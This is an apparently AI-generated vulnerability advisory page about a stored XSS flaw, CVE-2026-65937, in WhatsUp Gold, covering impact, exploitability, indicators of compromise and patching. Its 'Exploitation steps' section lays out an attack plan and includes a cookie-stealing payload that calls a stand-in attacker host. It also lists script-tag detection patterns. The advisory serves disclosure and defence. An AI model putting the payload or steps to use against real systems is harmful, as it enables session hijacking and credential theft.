CVE-2026-65937
WhatsUp Gold vulnerability analysis and mitigation

Overview

CVE-2026-65937 is a stored Cross-Site Scripting (XSS) vulnerability in Progress Software's WhatsUp Gold network monitoring software. An authenticated attacker can bypass frontend input controls and inject persistent malicious script content into the application, affecting all users who subsequently view the injected content. All WhatsUp Gold versions released before 2026.0.2 are affected; the fix was shipped in version 2026.0.2 on August 12, 2026. The vulnerability carries a CVSS v3.1 base score of 8.0 (High) (Github Advisory, Progress Release Notes).

Technical details

The vulnerability is classified as CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-Site Scripting), specifically of the stored (persistent) variant. An authenticated attacker exploits insufficient server-side input sanitization by submitting crafted script payloads that bypass frontend validation controls; these payloads are then stored in the application and rendered to other users' browsers without proper encoding. The attack vector is Adjacent Network (AV:A), meaning the attacker must be on the same network segment or have authenticated access to the WhatsUp Gold web interface, and user interaction is required for the payload to execute in a victim's browser (Github Advisory, Progress Release Notes).

Impact

Successful exploitation enables persistent script execution in the browsers of any WhatsUp Gold user who views the injected content, resulting in high confidentiality, integrity, and availability impact per the CVSS scoring. Practical consequences include session hijacking, credential theft, unauthorized actions performed on behalf of victims, and potential lateral movement within the monitored network environment if administrator sessions are compromised. Because WhatsUp Gold is a network monitoring platform with broad visibility into infrastructure, compromise of administrator accounts could expose sensitive network topology, credentials, and device configurations (Github Advisory).

Exploitability

As of the time of disclosure, there is no public proof-of-concept exploit code and no evidence of in-the-wild exploitation (Github Advisory). The vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. The EPSS score is approximately 0.242% (16th percentile), indicating a low near-term probability of exploitation. Exploitation requires authentication and user interaction, which reduces the likelihood of opportunistic mass exploitation.

Exploitation steps

  1. Gain Authenticated Access: Obtain valid credentials to a WhatsUp Gold instance running a version prior to 2026.0.2, either through phishing, credential stuffing, or other means.
  2. Identify Injectable Fields: Navigate the WhatsUp Gold web interface to locate input fields that accept user-supplied content and are rendered to other users (e.g., device names, notes, alert descriptions, or custom dashboard elements).
  3. Craft XSS Payload: Prepare a stored XSS payload designed to bypass frontend validation controls, such as encoding the script tag or using event handler attributes (e.g., <img src=x onerror=fetch('https://attacker.com/?c='+document.cookie)>).
  4. Inject Payload: Submit the crafted payload through the identified input field, bypassing client-side controls (e.g., by intercepting the HTTP request with a proxy tool like Burp Suite and modifying the request body directly).
  5. Wait for Victim Interaction: When another authenticated user (ideally an administrator) views the page containing the injected content, the malicious script executes in their browser context.
  6. Harvest Session/Credentials: The script exfiltrates session cookies, authentication tokens, or other sensitive data to an attacker-controlled server, enabling account takeover and further access to monitored infrastructure (Github Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP/HTTPS requests from user browsers to unknown external domains shortly after accessing WhatsUp Gold pages; unusual DNS lookups originating from client machines accessing the WhatsUp Gold interface.
  • Logs: WhatsUp Gold application or IIS access logs showing POST requests containing encoded script tags (<script>, onerror=, javascript:, etc.) in input fields; repeated access to specific pages by multiple users in a short timeframe following a single authenticated write operation.
  • Application Data: Presence of script content (e.g., <script>, <img onerror=, javascript:) in stored application data such as device names, notes, alert descriptions, or dashboard configurations when reviewed directly in the database or via API.
  • User Activity: Unexpected session activity or logins from unusual IP addresses following legitimate user sessions, potentially indicating session token theft.

Mitigation and workarounds

Progress Software has released WhatsUp Gold version 2026.0.2 (released August 12, 2026), which addresses CVE-2026-65937 along with several other security issues (CVE-2026-65938, CVE-2026-65939, CVE-2026-65940, CVE-2026-65941). Organizations should upgrade to version 2026.0.2 or later as the primary remediation (Progress Release Notes). As interim measures, restrict access to the WhatsUp Gold web interface to authorized users only, enforce the principle of least privilege, and monitor application data and user activity logs for suspicious script content or unauthorized modifications (Github Advisory).

Additional resources


SourceThis report was generated using AI

Related WhatsUp Gold vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-65941HIGH8.8
  • WhatsUp Gold logoWhatsUp Gold
  • cpe:2.3:a:progress:whatsup_gold
NoYesAug 12, 2026
CVE-2026-65937HIGH8
  • WhatsUp Gold logoWhatsUp Gold
  • cpe:2.3:a:progress:whatsup_gold
NoYesAug 12, 2026
CVE-2026-65940MEDIUM6.8
  • WhatsUp Gold logoWhatsUp Gold
  • cpe:2.3:a:progress:whatsup_gold
NoYesAug 12, 2026
CVE-2026-65939MEDIUM6.8
  • WhatsUp Gold logoWhatsUp Gold
  • cpe:2.3:a:progress:whatsup_gold
NoYesAug 12, 2026
CVE-2026-65938MEDIUM4.3
  • WhatsUp Gold logoWhatsUp Gold
  • cpe:2.3:a:progress:whatsup_gold
NoYesAug 12, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management